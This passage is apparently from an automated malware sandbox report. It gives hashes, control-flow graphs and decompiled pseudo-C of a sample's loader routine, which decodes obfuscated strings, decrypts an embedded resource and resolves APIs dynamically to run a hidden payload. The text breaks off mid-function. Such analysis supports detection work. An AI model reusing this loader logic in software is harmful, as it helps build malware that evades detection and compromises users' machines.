                                                                                                                                                                                                        • Opcode Fuzzy Hash: fdb1ceb632895f2ec363503071cbd1049a222ebea5d83eaee7069884a7a4258e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2931D53190CA4C8FEB58DB68C849BF9BBE0FB65321F04422ED04DD3592DB74A856CB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 196 7ff815f00108-7ff815f00114 198 7ff815f00116 196->198 199 7ff815f0012b-7ff815f01802 ImpersonateLoggedOnUser 196->199 198->199 203 7ff815f01804 199->203 204 7ff815f0180a-7ff815f01831 199->204 203->204
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.341805634.00007FF815F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F00000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff815f00000_iDa05Vg46.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 92b561cb3358ecd9e5d9a1d558014f65b9bc5c165142b35dbace87f2dd2a204b
                                                                                                                                                                                                        • Instruction ID: fed7385aaf5ee559a42740616b6b748c629540e7bf26a2e688b72fa65b5638c0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92b561cb3358ecd9e5d9a1d558014f65b9bc5c165142b35dbace87f2dd2a204b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D021E13190CA0C8FEB48DF58D849BF9BBE1FB65320F00422ED04EC35A2DB64A846CB40
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 FindCloseChangeNotification GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 18 401c98-401c9a 16->18 20 401c7d-401c83 17->20 21 401c8f-401c91 17->21 22 401cb0-401cce call 401650 18->22 23 401c9c-401caf CloseHandle 18->23 20->16 25 401c85-401c8d 20->25 21->18 32 401cd0-401cd4 22->32 25->14 25->21 31 401ef3-401f1a call 401300 SizeofResource 27->31 28->31 38 401f1c-401f2f 31->38 39 401f5f-401f69 31->39 36 401cf0-401cf2 32->36 37 401cd6-401cd8 32->37 42 401cf5-401cf7 36->42 40 401cda-401ce0 37->40 41 401cec-401cee 37->41 43 401f33-401f5d call 401560 38->43 44 401f73-401f75 39->44 45 401f6b-401f72 39->45 40->36 46 401ce2-401cea 40->46 41->42 42->23 47 401cf9-401d09 Module32Next 42->47 43->39 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->49 50 401f77-401f8d call 401560 44->50 45->44 46->32 46->41 47->7 51 401d0f 47->51 49->5 86 4021aa-4021c0 49->86 50->49 55 401d10-401d2e call 401650 51->55 60 401d30-401d34 55->60 62 401d50-401d52 60->62 63 401d36-401d38 60->63 68 401d55-401d57 62->68 66 401d3a-401d40 63->66 67 401d4c-401d4e 63->67 66->62 70 401d42-401d4a 66->70 67->68 68->23 71 401d5d-401d7b call 401650 68->71 70->60 70->67 77 401d80-401d84 71->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 81 401da5-401da7 79->81 83 401d8a-401d90 80->83 84 401d9c-401d9e 80->84 81->23 85 401dad-401dbd Module32Next 81->85 83->79 87 401d92-401d9a 83->87 84->81 85->7 85->55 89 4021c6-4021ca 86->89 90 40246a-402470 86->90 87->77 87->84 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 94 402482-402487 93->94 94->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-402352 call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 128 402354-402355 SafeArrayDestroy 122->128 129 40235b-402361 122->129 123->122 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-4023a2 call 4018d0 SafeArrayCreateVector 133->135 134->135 139 4023a4-4023a9 call 40ad90 135->139 140 4023ae-4023b4 135->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E004019F0(void* __edx, void* __eflags) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				void* _t337;
                                                                                                                                                                                                        				void* _t340;
                                                                                                                                                                                                        				int _t341;
                                                                                                                                                                                                        				CHAR* _t344;
                                                                                                                                                                                                        				intOrPtr* _t349;
                                                                                                                                                                                                        				int _t350;
                                                                                                                                                                                                        				long _t352;
                                                                                                                                                                                                        				signed int _t354;
                                                                                                                                                                                                        				intOrPtr _t358;
                                                                                                                                                                                                        				long _t359;
                                                                                                                                                                                                        				CHAR* _t364;
                                                                                                                                                                                                        				struct HINSTANCE__* _t365;
                                                                                                                                                                                                        				CHAR* _t366;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t367;
                                                                                                                                                                                                        				int _t368;
                                                                                                                                                                                                        				int _t369;
                                                                                                                                                                                                        				int _t370;
                                                                                                                                                                                                        				intOrPtr* _t376;
                                                                                                                                                                                                        				int _t378;
                                                                                                                                                                                                        				intOrPtr _t379;
                                                                                                                                                                                                        				intOrPtr* _t381;
                                                                                                                                                                                                        				int _t383;
                                                                                                                                                                                                        				intOrPtr* _t384;
                                                                                                                                                                                                        				int _t385;
                                                                                                                                                                                                        				int _t396;
                                                                                                                                                                                                        				int _t399;
                                                                                                                                                                                                        				int _t402;
                                                                                                                                                                                                        				int _t405;
                                                                                                                                                                                                        				intOrPtr* _t407;
                                                                                                                                                                                                        				int _t413;
                                                                                                                                                                                                        				int _t415;
                                                                                                                                                                                                        				void* _t421;
                                                                                                                                                                                                        				int _t422;
                                                                                                                                                                                                        				int _t424;
                                                                                                                                                                                                        				intOrPtr* _t428;
                                                                                                                                                                                                        				intOrPtr _t429;
                                                                                                                                                                                                        				intOrPtr* _t431;
                                                                                                                                                                                                        				int _t432;
                                                                                                                                                                                                        				int _t435;
                                                                                                                                                                                                        				intOrPtr* _t437;
                                                                                                                                                                                                        				int _t438;
                                                                                                                                                                                                        				intOrPtr* _t439;
                                                                                                                                                                                                        				int _t440;
                                                                                                                                                                                                        				int _t442;
                                                                                                                                                                                                        				signed int _t448;
                                                                                                                                                                                                        				signed int _t451;
                                                                                                                                                                                                        				signed int _t452;
                                                                                                                                                                                                        				int _t469;
                                                                                                                                                                                                        				int _t471;
                                                                                                                                                                                                        				int _t482;
                                                                                                                                                                                                        				signed int _t486;
                                                                                                                                                                                                        				intOrPtr* _t488;
                                                                                                                                                                                                        				intOrPtr* _t490;
                                                                                                                                                                                                        				intOrPtr* _t492;
                                                                                                                                                                                                        				intOrPtr _t493;
                                                                                                                                                                                                        				void* _t494;
                                                                                                                                                                                                        				struct HRSRC__* _t497;
                                                                                                                                                                                                        				void* _t514;
                                                                                                                                                                                                        				int _t519;
                                                                                                                                                                                                        				intOrPtr* _t520;
                                                                                                                                                                                                        				void* _t524;
                                                                                                                                                                                                        				void* _t525;
                                                                                                                                                                                                        				struct HINSTANCE__* _t526;
                                                                                                                                                                                                        				intOrPtr _t527;
                                                                                                                                                                                                        				void* _t531;
                                                                                                                                                                                                        				void* _t535;
                                                                                                                                                                                                        				struct HRSRC__* _t536;
                                                                                                                                                                                                        				intOrPtr* _t537;
                                                                                                                                                                                                        				intOrPtr* _t539;
                                                                                                                                                                                                        				int _t542;
                                                                                                                                                                                                        				int _t543;
                                                                                                                                                                                                        				intOrPtr* _t547;
                                                                                                                                                                                                        				intOrPtr* _t548;
                                                                                                                                                                                                        				intOrPtr* _t549;
                                                                                                                                                                                                        				intOrPtr* _t550;
                                                                                                                                                                                                        				void* _t551;
                                                                                                                                                                                                        				intOrPtr _t552;
                                                                                                                                                                                                        				int _t555;
                                                                                                                                                                                                        				void* _t556;
                                                                                                                                                                                                        				void* _t557;
                                                                                                                                                                                                        				void* _t558;
                                                                                                                                                                                                        				void* _t559;
                                                                                                                                                                                                        				void* _t560;
                                                                                                                                                                                                        				void* _t561;
                                                                                                                                                                                                        				void* _t562;
                                                                                                                                                                                                        				intOrPtr* _t563;
                                                                                                                                                                                                        				void* _t564;
                                                                                                                                                                                                        				void* _t565;
                                                                                                                                                                                                        				void* _t566;
                                                                                                                                                                                                        				void* _t567;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t567 = __eflags;
                                                                                                                                                                                                        				_t494 = __edx;
                                                                                                                                                                                                        				__imp__OleInitialize(0); // executed
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x18)) = 0xe0;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x19)) = 0x3b;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x1a)) = 0x8d;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x1b)) = 0x2a;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x1c)) = 0xa2;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x1d)) = 0x2a;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x1e)) = 0x2a;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x1f)) = 0x41;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x20)) = 0xd3;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x21)) = 0x20;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x22)) = 0x64;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x23)) = 6;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x24)) = 0x8a;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x25)) = 0xf7;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x26)) = 0x3d;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x27)) = 0x9d;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x28)) = 0xd9;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x29)) = 0xee;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x2a)) = 0x15;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x2b)) = 0x68;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x2c)) = 0xf4;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x2d)) = 0x76;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x2e)) = 0xb9;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x2f)) = 0x34;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x30)) = 0xbf;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x31)) = 0x1e;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x32)) = 0xe7;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x33)) = 0x78;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x34)) = 0x98;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x35)) = 0xe9;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x36)) = 0x6f;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x37)) = 0xb4;
                                                                                                                                                                                                        				 *((char*)(_t556 + 0x38)) = 0;
                                                                                                                                                                                                        				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                                                                                                                                                                                                        				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                                                                                                                                                                                                        				_t557 = _t556 + 0xc;
                                                                                                                                                                                                        				if(_t337 == 0x41b2a0) {
                                                                                                                                                                                                        					L80:
                                                                                                                                                                                                        					__eflags = 0;
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                                                                                                                                                        					_t525 = _t340;
                                                                                                                                                                                                        					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x64)) = 0xce;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x65)) = 0x27;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x66)) = 0x9c;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x67)) = 0x1a;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x68)) = 0x95;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x69)) = 0x2e;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x6a)) = 0x22;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x6b)) = 0x57;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x6c)) = 0x91;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x6d)) = 0x21;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x6e)) = 0x57;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x6f)) = 0x3a;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x70)) = 0xf8;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x71)) = 0x98;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x72)) = 0x5b;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x73)) = 0xf4;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x74)) = 0xb5;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x75)) = 0x87;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x76)) = 0x7b;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x77)) = 0xf;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x78)) = 0xf4;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x79)) = 0x76;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x7a)) = 0xb9;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x7b)) = 0x34;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x7c)) = 0xbf;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x7d)) = 0x1e;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x7e)) = 0xe7;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x7f)) = 0x78;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x80)) = 0x98;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x81)) = 0xe9;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x82)) = 0x6f;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x83)) = 0xb4;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x84)) = 0;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x18)) = 0xc0;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x19)) = 0x38;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x1a)) = 0x8d;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x1b)) = 0x1f;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x1c)) = 0x8e;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x1d)) = 0x30;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x1e)) = 0x65;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x1f)) = 0x47;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x20)) = 0xd3;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x21)) = 0x29;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x22)) = 0x3b;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x23)) = 0x56;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x24)) = 0xf8;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x25)) = 0x98;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x26)) = 0x5b;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x27)) = 0xf4;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x28)) = 0xb5;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x29)) = 0x87;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x2a)) = 0x7b;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x2b)) = 0xf;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x2c)) = 0xf4;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x2d)) = 0x76;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x2e)) = 0xb9;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x2f)) = 0x34;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x30)) = 0xbf;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x31)) = 0x1e;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x32)) = 0xe7;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x33)) = 0x78;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x34)) = 0x98;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x35)) = 0xe9;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x36)) = 0x6f;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x37)) = 0xb4;
                                                                                                                                                                                                        					 *((char*)(_t557 + 0x38)) = 0;
                                                                                                                                                                                                        					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                                                                                                                                                                                                        					if(_t341 == 0) {
                                                                                                                                                                                                        						L38:
                                                                                                                                                                                                        						FindCloseChangeNotification(_t525); // executed
                                                                                                                                                                                                        						_t526 = GetModuleHandleA(0);
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x1c)) = 0xfc;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x1d)) = 0xb;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x1e)) = 0xff;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x1f)) = 0x75;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x20)) = 0xe7;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x21)) = 0x44;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x22)) = 0x4b;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x23)) = 0x23;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x24)) = 0xbf;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x25)) = 0x45;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x26)) = 0x3b;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x27)) = 0x56;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x28)) = 0xf8;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x29)) = 0x98;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x2a)) = 0x5b;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x2b)) = 0xf4;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x2c)) = 0xb5;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x2d)) = 0x87;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x2e)) = 0x7b;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x2f)) = 0xf;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x30)) = 0xf4;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x31)) = 0x76;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x32)) = 0xb9;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x33)) = 0x34;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x34)) = 0xbf;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x35)) = 0x1e;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x36)) = 0xe7;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x37)) = 0x78;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x38)) = 0x98;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x39)) = 0xe9;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x3a)) = 0x6f;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x3b)) = 0xb4;
                                                                                                                                                                                                        						 *((char*)(_t557 + 0x3c)) = 0;
                                                                                                                                                                                                        						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                                                                                                                                                                                                        						_t558 = _t557 + 8;
                                                                                                                                                                                                        						_t536 = FindResourceA(_t526, _t344, 0xa);
                                                                                                                                                                                                        						 *(_t558 + 0x50) = _t536;
                                                                                                                                                                                                        						_t551 = LoadResource(_t526, _t536);
                                                                                                                                                                                                        						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                                                                                                                                                                                                        						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                                                                                                                                                                                                        						_push(0x40022);
                                                                                                                                                                                                        						_t537 = _t349; // executed
                                                                                                                                                                                                        						_t350 = E0040AF66(0, _t526, __eflags); // executed
                                                                                                                                                                                                        						_t559 = _t558 + 8;
                                                                                                                                                                                                        						 *(_t559 + 0x34) = _t350;
                                                                                                                                                                                                        						__eflags = _t350;
                                                                                                                                                                                                        						if(_t350 == 0) {
                                                                                                                                                                                                        							 *(_t559 + 0x50) = 0;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							E0040BA30(_t526, _t350, 0, 0x40022);
                                                                                                                                                                                                        							_t486 =  *(_t559 + 0x40);
                                                                                                                                                                                                        							_t559 = _t559 + 0xc;
                                                                                                                                                                                                        							 *(_t559 + 0x50) = _t486;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						E00401300( *(_t559 + 0x50));
                                                                                                                                                                                                        						_t497 =  *(_t559 + 0x48);
                                                                                                                                                                                                        						_t352 = SizeofResource(_t526, _t497);
                                                                                                                                                                                                        						 *(_t559 + 0x40) = _t352;
                                                                                                                                                                                                        						asm("cdq");
                                                                                                                                                                                                        						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                                                                                                                                                                                                        						__eflags = _t354;
                                                                                                                                                                                                        						if(_t354 > 0) {
                                                                                                                                                                                                        							_t519 =  *(_t559 + 0x3c);
                                                                                                                                                                                                        							_t482 = _t537 - _t519;
                                                                                                                                                                                                        							__eflags = _t482;
                                                                                                                                                                                                        							 *(_t559 + 0x34) = _t519;
                                                                                                                                                                                                        							 *(_t559 + 0x88) = _t482;
                                                                                                                                                                                                        							 *(_t559 + 0x38) = _t354;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t424 =  *(_t559 + 0x34);
                                                                                                                                                                                                        								_push( *(_t559 + 0x88) + _t424);
                                                                                                                                                                                                        								_push(0x400);
                                                                                                                                                                                                        								_push(_t424);
                                                                                                                                                                                                        								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                                                                                                                                                                                                        								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                                                                                                                                                                                                        								_t179 = _t559 + 0x38;
                                                                                                                                                                                                        								 *_t179 =  *(_t559 + 0x38) - 1;
                                                                                                                                                                                                        								__eflags =  *_t179;
                                                                                                                                                                                                        							} while ( *_t179 != 0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t448 =  *(_t559 + 0x40) & 0x800003ff;
                                                                                                                                                                                                        						__eflags = _t448;
                                                                                                                                                                                                        						if(_t448 < 0) {
                                                                                                                                                                                                        							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                                                                                                                        							__eflags = _t448;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t448;
                                                                                                                                                                                                        						if(_t448 > 0) {
                                                                                                                                                                                                        							_t421 =  *(_t559 + 0x40) - _t448;
                                                                                                                                                                                                        							_push(_t421 + _t537);
                                                                                                                                                                                                        							_push(_t448);
                                                                                                                                                                                                        							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                                                                                                                                                                                                        							__eflags = _t422;
                                                                                                                                                                                                        							_push(_t422);
                                                                                                                                                                                                        							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                                                                                                                                                                                                        						_t560 = _t559 + 0xc;
                                                                                                                                                                                                        						FreeResource(_t551);
                                                                                                                                                                                                        						_t552 =  *_t537;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                                                                                                                                                                                                        						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                                                                                                                                                                                                        						_t561 = _t560 + 4;
                                                                                                                                                                                                        						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                                                                                                                                                                                                        						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                                                                                                                                                                                                        						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                                                                                                                                                                                                        						_t192 = _t537 + 4; // 0x4
                                                                                                                                                                                                        						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                                                                                                                                                                                                        						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                                                                                                                                                                                                        						_t528 = _t527 + 0xe;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x34)) = 0xce;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x35)) = 0x27;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x36)) = 0x9c;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x37)) = 0x1a;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x38)) = 0x95;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x39)) = 0x21;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x3a)) = 0x2e;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x3b)) = 0xd;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x3c)) = 0xdb;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x3d)) = 0x29;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x3e)) = 0x57;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x3f)) = 0x56;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x40)) = 0xf8;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x41)) = 0x98;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x42)) = 0x5b;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x43)) = 0xf4;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x44)) = 0xb5;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x45)) = 0x87;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x46)) = 0x7b;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x47)) = 0xf;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x48)) = 0xf4;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x49)) = 0x76;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x4a)) = 0xb9;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x4b)) = 0x34;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x4c)) = 0xbf;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x4d)) = 0x1e;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x4e)) = 0xe7;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x4f)) = 0x78;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x50)) = 0x98;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x51)) = 0xe9;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x52)) = 0x6f;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x53)) = 0xb4;
                                                                                                                                                                                                        						 *((char*)(_t561 + 0x54)) = 0;
                                                                                                                                                                                                        						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
                                                                                                                                                                                                        						_t562 = _t561 + 0x24;
                                                                                                                                                                                                        						_t365 = LoadLibraryA(_t364); // executed
                                                                                                                                                                                                        						_t538 = _t365;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x10)) = 0xe0;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x11)) = 0x18;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x12)) = 0xad;
                                                                                                                                                                                                        						 *((char*)(_t562 + 0x13)) = 0x36;
